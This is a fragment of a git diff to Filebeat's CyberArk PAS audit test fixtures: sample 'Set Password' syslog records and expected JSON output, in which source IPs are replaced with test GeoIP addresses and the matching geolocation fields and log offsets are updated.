+<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMP_ADB_asr-cyberark-psm-ssh</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json
index 40989a6cec03..bbc572cd230a 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json
@@ -195,7 +195,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:52",
         "event.action": "set password",
         "event.code": "88",
@@ -214,19 +214,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -241,7 +238,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:52",
         "event.action": "set password",
         "event.code": "88",
@@ -253,26 +250,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3272,
+        "log.offset": 3271,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -287,7 +281,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:55",
         "event.action": "set password",
         "event.code": "88",
@@ -299,26 +293,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3850,
+        "log.offset": 3848,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -333,7 +324,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:46:47",
         "event.action": "set password",
         "event.code": "88",
@@ -345,26 +336,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4430,
+        "log.offset": 4427,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -379,7 +367,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:46:47",
         "event.action": "set password",
         "event.code": "88",
@@ -391,26 +379,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4994,
+        "log.offset": 4990,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -425,7 +410,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
         "event.action": "set password",
         "event.code": "88",
@@ -437,25 +422,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5557,
+        "log.offset": 5552,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -470,7 +453,7 @@
         "cyberarkpas.audit.message": "Set Password",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
         "event.action": "set password",
         "event.code": "88",
@@ -482,25 +465,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6121,
+        "log.offset": 6115,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -513,10 +494,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:54Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Set Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:54</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:54</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:54",
         "event.action": "set password",
         "event.code": "88",
@@ -528,26 +509,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6684,
+        "log.offset": 6677,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -560,10 +538,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:55Z",
         "cyberarkpas.audit.issuer": "PSMPGW_VAGRANT",
         "cyberarkpas.audit.message": "Set Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:55</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:55Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:55</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:55Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:55",
         "event.action": "set password",
         "event.code": "88",
@@ -575,26 +553,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8094,
+        "log.offset": 8085,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -607,10 +582,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:10:33Z",
         "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN",
         "cyberarkpas.audit.message": "Set Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.66.114.180</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.66.114.180",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 11 12:10:33",
         "event.action": "set password",
         "event.code": "88",
@@ -622,25 +597,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9502,
+        "log.offset": 9491,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.66.114.180",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "34.66.114.180",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -653,10 +629,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z",
         "cyberarkpas.audit.issuer": "PSMPGW_SSH",
         "cyberarkpas.audit.message": "Set Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:25",
         "event.action": "set password",
         "event.code": "88",
@@ -668,23 +644,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 10910,
+        "log.offset": 10895,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -697,10 +676,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z",
         "cyberarkpas.audit.issuer": "PSMPApp_SSH",
         "cyberarkpas.audit.message": "Set Password",
